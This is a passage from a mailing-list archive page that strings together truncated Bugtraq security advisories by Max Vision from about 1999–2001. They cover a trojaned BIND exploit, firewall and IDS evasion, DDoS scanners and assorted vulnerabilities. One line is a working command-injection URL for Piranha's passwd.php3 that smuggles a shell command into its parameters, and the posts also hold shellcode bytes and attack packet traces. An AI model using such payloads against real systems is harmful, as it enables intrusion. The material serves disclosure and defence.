Although that is a great idea in general, it would not have helped in this
case. The ruse was very well hidden and and ASCII inspection would not
have revealed the nai.com address.
I think forums like Bugtraq *should* post exploit code that is submitted,
so that other experts in the community co
and step away from the Internet!
Max
>Date: Wed, 31 Jan 2001 20:57:54 -0800
>To: [EMAIL PROTECTED]
>From: Max Vision <[EMAIL PROTECTED]>
>Subject: That BIND8 "exploit" attacks NAI
>
>Hi,
>
>Please beware of running code such as this. It will do it's best t
Hi,
Please beware of running code such as this. It will do it's best to attack
NAI's nameserver. It's a typical, though well disguised, shellcode trick.
Look in the Linux shellcode:
\xa1\x45\x03\x96 == 161.69.3.150 == dns1.nai.com
More details after I have a better look...
Max
At 04:12 PM 1
Hi,
The BIND 9.1.0beta releases and now BIND 9.1.0 include another hard coded
chaos record called "authors". So now even if an admin changes or
suppresses their version reply string, a remote user can still determine
whether the server is running BIND 9.x. With the recent discovery of the
tsig
On Mon, 24 Apr 2000, Alfred Huger wrote:
> >Additionally, using nmap's -f flag allows you to send traffic past
> >ZoneAlarm without any alerts.
>
> I set up a copy on a local machine here and while I found that source port
> scans from 67 slipped past the firewall -f seemed to be alerted on just
>
piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT
Fix is available for x86 RH 6.2 users at
ftp://updates.redhat.com/6.2/i386/piranha-gui-0.4.13-1.i386.rpm
--
Max Vision Network Security<[EMAIL PROTEC
d to quickly test your browsing system for this configuration of Shaft,
as well as Trinoo, TFN, Stacheldraht, Stacheldraht4, and WinTrinoo. The
self-scan tools can be found at:
http://dev.whitehats.com/scan/ddos/
I have also collected related DDOS tools, media commentary, and a small
forum f
elease (R4.5.2), the sequence number vulnerability still
exists.
http://bebugs.be.com/devbugs/detail.php3?oid=1437472
http://bebugs.be.com/devbugs/detail.php3?oid=616
Poor ISN generation is an outstanding issue for BeOS.
Max Vision
http://whitehats.com/
om my very limited
portscan tests?
On Wed, 23 Feb 2000, Max Vision wrote:
> You might want to strip R_URG as well, since per RFC 793 you can set the
> URG flag on packets with minimal effect to state.
>
...
>
> Max
>
> --
> Max Vision Network Security<[EM
7;m speculating that this
would result in a valid exchange that would subvert certain common IDS.
Max
--
Max Vision Network Security<[EMAIL PROTECTED]>
Network Security Assessment http://maxvision.net/
100% Success Rate : Penetration Testing & Risk Mitigation
Free Visibility Analysis and Price Quote for Your Network
FYI,
I have since discovered that Symantec has removed *all* default exclusions
in their Norton AntiVirus 7.0 (corporate edition). Gone are the RECYCLED
folder, the windows executables, and the wildcard exclusions. Nice
default. It looks like they have addressed this bug.
Program Version: 7.
stripping
"immunization" headers/footers, or even xor!@# I'm not sure defense has
come very far since then. Be careful what you download and run!
Max Vision
http://whitehats.com/
http://maxvision.net/
Hi,
Someone tried this on one of my domains a few weeks ago, and I wrote up a
brief account of the incident, show some of the technical details of the
actual attack, and describe how admin should upgrade their Guardian
authentication settings with Internic if they haven't already done so.
Inter
website, http://www.phorum.org/
[direct link: http://www.phorum.org/downloads/phorum308.tar.gz ]
3.0.8 Change Log
--
fixed SQL security bug in read.php3.
Violation page no longer sends emails.
Removed built-in security from admin as it was inadequate.
admin.php33 and upgrade.php33 are disabled by default.
Removed code.php33.
Commented out backdoor from auth.php33.
Max Vision
http://whitehats.com/
http://maxvision.net/
also available as part of
http://dev.whitehats.com/ids/vision.conf
Note that each record includes packet traces from usage of an actual
exploit attempt.
Max Vision
http://whitehats.com/ <- free tools, forums, IDS database
http://maxvision.net/
On Fri, 31 Dec 1999, Brock Tellier wr
s a resource to help network and security administrators by
offering free software and community support. This site features the
world's first open Intrusion Detection database, arachNIDS."
Max Vision
Network Security Architect
http://whitehats.com/ <- free tools, forums, and IDS database
http://maxvision.net/
ey length" with "dynamic fonts" and it is equally valid. For more
information and a sample exploit see
http://www.whitehats.com/browsers/maxvisioncrash47/index.html ]
Max Vision
On Fri, 15 Oct 1999, Michael Breuer wrote:
> I have found a buffer overflow in Netscape Communicator proba
Hello,
I posted two short write-ups on recent Internet worms I've seen in the wild
(ADMw0rm and Millennium Worm). http://whitehats.com/worms/. From these
previous posts it looks like someone has launched a variation of the
Millennium Worm.
Max Vision
At 05:23 PM 9/7/1999 +0200, Adam Mor
Hi,
"Version 2.5a Released 5 May 1999
* Fixed bug introduced in v2.5 causing crashes with long paths in FTP
commands."
Upgrade is available at http://www.ftpserv-u.com/.
Original thread:
http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-04-28&[EMAIL PROT
omise
technique?
Required reading:
Understanding the DCOM Wire Protocol by Analyzing Network Data Packets
http://www.guyeddon.com/MSJ3-98.htm
Using Distributed COM with Firewalls
http://www.iapetus.com/dcom/dcomfw.htm
Max Vision
http://maxvision.net/
On Wed, 18 Aug 1999, Hargett, Matt wrote:
's code is out of control here :)
FYI, tcpdump of an attack from any of them:
SOURCE > TARGET: icmp: parameter problem - octet 0 (frag 1234:9@0+)
SOURCE > TARGET: (frag 1234:16@8+)
This attack does not seem to affect Win98SE (4.10.A) nor Win2000
(5.00.2072).
Max Vision
Senior Security Architect
Globalstar L.P.
21 matches
Mail list logo
